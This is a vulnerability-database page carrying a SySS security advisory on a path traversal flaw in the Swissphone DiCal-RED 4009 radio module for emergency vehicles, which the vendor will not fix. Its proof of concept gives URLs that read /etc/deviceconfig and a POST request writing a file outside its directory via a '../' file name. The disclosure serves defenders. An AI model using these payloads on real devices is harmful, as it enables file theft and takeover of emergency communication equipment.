Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

DiCal-RED 4009 Path Traversal

🗓️ 23 Aug 2024 00:00:00Reported by Sebastian Hamann, syss.deType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 255 Views

DiCal-RED 4009 Path Traversal, High risk level, Remote code execution vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
Circl		CVE-2024-36442
22 Aug 202417:42
circl
CVE		CVE-2024-36442
22 Aug 202400:00
cve
Cvelist		CVE-2024-36442
22 Aug 202400:00
cvelist
NVD		CVE-2024-36442
22 Aug 202415:15
nvd
Positive Technologies		PT-2024-27002 · Swissphone · Swissphone Dical-Red 4009
22 Aug 202400:00
ptsecurity
RedhatCVE		CVE-2024-36442
23 May 202508:17
redhatcve
Vulnrichment		CVE-2024-36442
22 Aug 202400:00
vulnrichment
`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512  
  
Advisory ID: SYSS-2024-039  
Product: DiCal-RED  
Manufacturer: Swissphone Wireless AG  
Affected Version(s): Unknown  
Tested Version(s): 4009  
Vulnerability Type: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') (CWE-22)  
Risk Level: High  
Solution Status: Open  
Manufacturer Notification: 2024-04-16  
Solution Date: None  
Public Disclosure: 2024-08-20  
CVE Reference: CVE-2024-36442  
Author of Advisory: Sebastian Hamann, SySS GmbH  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Overview:  
  
DiCal-RED is a radio module for communication between emergency vehicles and  
control rooms. It provides Ethernet, Wi-Fi and cellular network connectivity  
and runs a Linux- and BusyBox-based operating system.  
  
The manufacturer describes the product as follows (see [1]):  
  
"The DiCal-Red radio data module reliably guides you to your destination. This  
is ensured by the linking of navigation (also for the transmission of position  
data) and various radio modules."  
  
Due to a path traversal issue, the device is vulnerable to the disclosure  
of arbitrary files and modification of system files, effectively leading to  
remote code execution.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Vulnerability Details:  
  
The administrative web interface of the device is vulnerable to path traversal  
attacks in several places.  
  
The functions to download or display log files can be used to access arbitrary  
files on the device's file system.  
The upload function for new license files can be used to write files anywhere  
on the device's file system - possibly overwriting important system  
configuration files, binaries or scripts.  
Replacing files that are executed during system operation results in a full  
compromise of the whole device.  
  
Note that the attacker needs to be authenticated in order to exploit these  
vulnerabilities, i.e. know the administrative system password or its MD5  
hash (cf. SYSS-2024-038).  
However, due to another vulnerability (cf. SYSS-2024-040), authentication is  
not required to display file contents.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Proof of Concept (PoC):  
  
An attacker can download the file /etc/deviceconfig via the following URL:  
http:/192.0.2.1/cgi-bin/fdmcgiwebv2.cgi?action=downloadfile&data={%22FilePath%22:%22/etc/deviceconfig%22}  
  
Alternatively, the same file can be viewed via  
http:/192.0.2.1/cgi-bin/fdmcgiwebv2.cgi?action=displayfilel&data={%22FilePath%22:%22/etc/deviceconfig%22}  
  
The following HTTP POST request uploads a file to the root directory (/) of  
the device's file system:  
  
POST /cgi-bin/fdmcgiwebv2.cgi?action=fileupload HTTP/1.1  
Host: 192.0.2.1  
Content-Length: 190  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarynMcoPJ7jKTghQbK5  
[...]  
Cookie: QSESSIONID=[...]  
  
------WebKitFormBoundarynMcoPJ7jKTghQbK5  
Content-Disposition: form-data; name="binary"; filename="../poc.txt"  
Content-Type: text/plain  
  
PoC  
  
------WebKitFormBoundarynMcoPJ7jKTghQbK5--  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Solution:  
  
The manufacturer recommends not running the device in an untrusted network.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Disclosure Timeline:  
  
2024-02-29: Vulnerability discovered  
2024-04-16: Vulnerability reported to manufacturer  
2024-05-10: Manufacturer states that the vulnerability will not be fixed  
2024-05-14: Vulnerability reported to CERT-Bund  
2024-08-13: CERT-Bund informs us that the vendor declared the product EOL  
2024-08-20: Public disclosure of vulnerability  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
References:  
  
[1] Product website for DiCal-RED  
https://www.swissphone.com/solutions/components/terminals/radio-data-module-dical-red/  
[2] SySS Security Advisory SYSS-2024-039  
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-039.txt  
[3] SySS Responsible Disclosure Policy  
https://www.syss.de/en/responsible-disclosure-policy  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Credits:  
  
This security vulnerability was found by Sebastian Hamann of SySS GmbH.  
  
E-Mail: [email protected]  
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Sebastian_Hamann.asc  
Key ID: 0x9CE0E440429D8B96  
Key Fingerprint: F643 DF21 62C4 7C53 7DB2 8BA1 9CE0 E440 429D 8B96  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Disclaimer:  
  
The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS website.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Copyright:  
  
Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en  
  
-----BEGIN PGP SIGNATURE-----  
  
iQIzBAEBCgAdFiEE9kPfIWLEfFN9souhnODkQEKdi5YFAmbEQgMACgkQnODkQEKd  
i5Z0/Q//URU2aC1Di8bK/CntBDFfjMk+fD0nXKwo7C/GSOy41y7xBlz9e9UzJKPP  
fI7fa8RQkbZDlDzpTQHXbvpSocbahWIM62B+c7uGm1EGZyejn7IpJUSbhRZHzKqM  
sNukpHq10p/AA6BJn4baFgfFIdV+HzXPAm3bkxovL3pUmMYVgFsfzuzpZ3wOqKbn  
M276mEmsBDG2Yi7HqWetqtYAjb35DVokrug+uT8DDe3SSE9V16iqo8EqMqMBXD7L  
aCvVnnVl1ElqJSsIyClyXLoKLcWbBN4zAUlb6f90PEeUtNt5/qhRiLDzprum8BYo  
7DhMz8MwOTTijNKRcYpVkOfPg1htmdUe5JqElktGcfNDj5YvU4KzG89srigHreJP  
yIVM+J0VX4fQ28cjKTS/qyXOAeIqJq//3/vbsgA3YNlP+IPBZYav8//HEPJD1PiD  
fBlwhQ7skn/EaCBi8EMatu7/xymA34rnTmmqS5+MCViWcTTB2+fF7H2xhZl1biHD  
DcVMVGgbNAdRIYFkJAh6qg0sXd1VOb8etAhFRQmMt5MeSK+ErbAIiaWTot2wwvbS  
jbTsEG+VL0HTIfEI/utghGDB+044hJceEyaqRJ/qq/3Zx1C13ZsKLPeXZaMoeEWM  
1nYLOJFL/R/i+UjFsFzxDG/IcbionJYOTvULa4vPafdZQ6Yol80=  
=BeZD  
-----END PGP SIGNATURE-----  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
23 Aug 2024 00:00Current
7.1High risk
Vulners AI Score7.1
CVSS 3.18.8
EPSS0.00166
SSVC
dical-redpath traversalhigh riskremote code executionlinux-basedbusyboxauthenticationdisclosurecert-bund
255